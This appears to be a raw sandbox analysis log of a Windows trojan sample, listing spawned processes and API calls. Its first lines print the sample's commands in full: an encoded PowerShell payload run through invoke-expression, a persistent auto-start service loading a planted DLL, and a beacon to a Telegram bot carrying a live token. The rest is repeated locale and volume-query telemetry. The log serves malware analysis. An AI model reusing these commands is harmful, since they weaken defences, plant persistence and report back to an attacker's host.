    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $decoded;"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $decoded;"
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x882081 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x882081\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x882081.dat" /f && sc start x882081
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7607027553:aahrudqnba23c1me3ecfjgijnq0h1nbcp5y/sendmessage' -method post -contenttype 'application/json' -body (convertto-json @{chat_id='1536131459'; text='[loader] user@965969: installed success.'});"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7607027553:aahrudqnba23c1me3ecfjgijnq0h1nbcp5y/sendmessage' -method post -contenttype 'application/json' -body (convertto-json @{chat_id='1536131459'; text='[loader] user@965969: installed success.'});"
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $decoded;"Jump to behavior
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c sc create x882081 binpath= "c:\windows\system32\svchost.exe -k dcomlaunch" type= own start= auto && reg add hklm\system\currentcontrolset\services\x882081\parameters /v servicedll /t reg_expand_sz /d "c:\windows\system32\x882081.dat" /f && sc start x882081Jump to behavior
    Source: C:\Windows \System32\printui.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7607027553:aahrudqnba23c1me3ecfjgijnq0h1nbcp5y/sendmessage' -method post -contenttype 'application/json' -body (convertto-json @{chat_id='1536131459'; text='[loader] user@965969: installed success.'});"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "$decoded = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string('qwrklu1wuhjlzmvyzw5jzsatrxhjbhvzaw9uugf0acaijgvudjptexn0zw1ecml2zvxxaw5kb3dzifxtexn0zw0zmii7dqpbzgqttxbqcmvmzxjlbmnlic1fegnsdxnpb25qyxroicikzw52oln5c3rlburyaxzlxfdpbmrvd3ncu3lzdgvtmziiow==')); invoke-expression $decoded;"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "invoke-restmethod -uri 'https://api.telegram.org/bot7607027553:aahrudqnba23c1me3ecfjgijnq0h1nbcp5y/sendmessage' -method post -contenttype 'application/json' -body (convertto-json @{chat_id='1536131459'; text='[loader] user@965969: installed success.'});"
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: 0_2_00007FF74502BC80 cpuid 0_2_00007FF74502BC80
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,0_2_00007FF745021F6C
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF745029670
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: EnumSystemLocalesW,0_2_00007FF7450295D8
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: EnumSystemLocalesW,0_2_00007FF745021890
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: GetLocaleInfoW,0_2_00007FF7450298B4
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: GetLocaleInfoW,0_2_00007FF745029AC0
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00007FF7450291A4
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF745029A0C
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: EnumSystemLocalesW,0_2_00007FF745029508
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: EnumSystemLocalesEx,0_2_00007FF745021B34
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: GetLocaleInfoEx,GetLocaleInfoW,0_2_00007FF745021C04
    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF745029C04
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,5_2_00007FF6CF9B8268
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_00007FF6CF9C1048
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: GetLocaleInfoEx,GetLocaleInfoW,5_2_00007FF6CF9B7F00
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: GetLocaleInfoW,5_2_00007FF6CF9C0F04
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_00007FF6CF9C0E50
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: EnumSystemLocalesEx,5_2_00007FF6CF9B7E30
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: GetLocaleInfoW,5_2_00007FF6CF9C0CF8
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: EnumSystemLocalesW,5_2_00007FF6CF9B7B8C
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_00007FF6CF9C0AB4
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: EnumSystemLocalesW,5_2_00007FF6CF9C0A1C
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: EnumSystemLocalesW,5_2_00007FF6CF9C094C
    Source: C:\Users\user\Desktop\curlapp64.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,5_2_00007FF6CF9C05E8
    Source: C:\Windows\System32\svchost.exeCode function: strtoul,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,strncmp,49_2_682864E0
    Source: C:\Windows\System32\svchost.exeCode function: strchr,pthread_mutex_lock,strcmp,strncpy,EnumSystemLocalesA,pthread_mutex_unlock,strcpy,pthread_mutex_unlock,abort,49_2_68287D70
    Source: C:\Windows\System32\svchost.exeCode function: getenv,GetLocaleInfoA,49_2_68286680
    Source: C:\Windows\System32\svchost.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,49_2_00007FF8A70B0348
    Source: C:\Windows\System32\svchost.exeCode function: memset,MultiByteToWideChar,GetLocaleInfoEx,malloc,malloc,strspn,49_2_00007FF8B8B14B70
    Source: C:\Windows\System32\console_zero.exeCode function: AreFileApisANSI,EnumSystemLocalesEx,GetDateFormatEx,GetLocaleInfoEx,GetTimeFormatEx,GetUserDefaultLocaleName,IsValidLocaleName,LCMapStringEx,LCIDToLocaleName,LocaleNameToLCID,55_2_00007FF6BC0C1B38
    Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesEx,55_2_00007FF6BC0C1700
    Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoEx,GetLocaleInfoW,55_2_00007FF6BC0C17D0
    Source: C:\Windows\System32\console_zero.exeCode function: GetLocaleInfoEx,FormatMessageA,55_2_00007FF6BC0AC254
    Source: C:\Windows\System32\console_zero.exeCode function: EnumSystemLocalesW,55_2_00007FF6BC0C145C
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
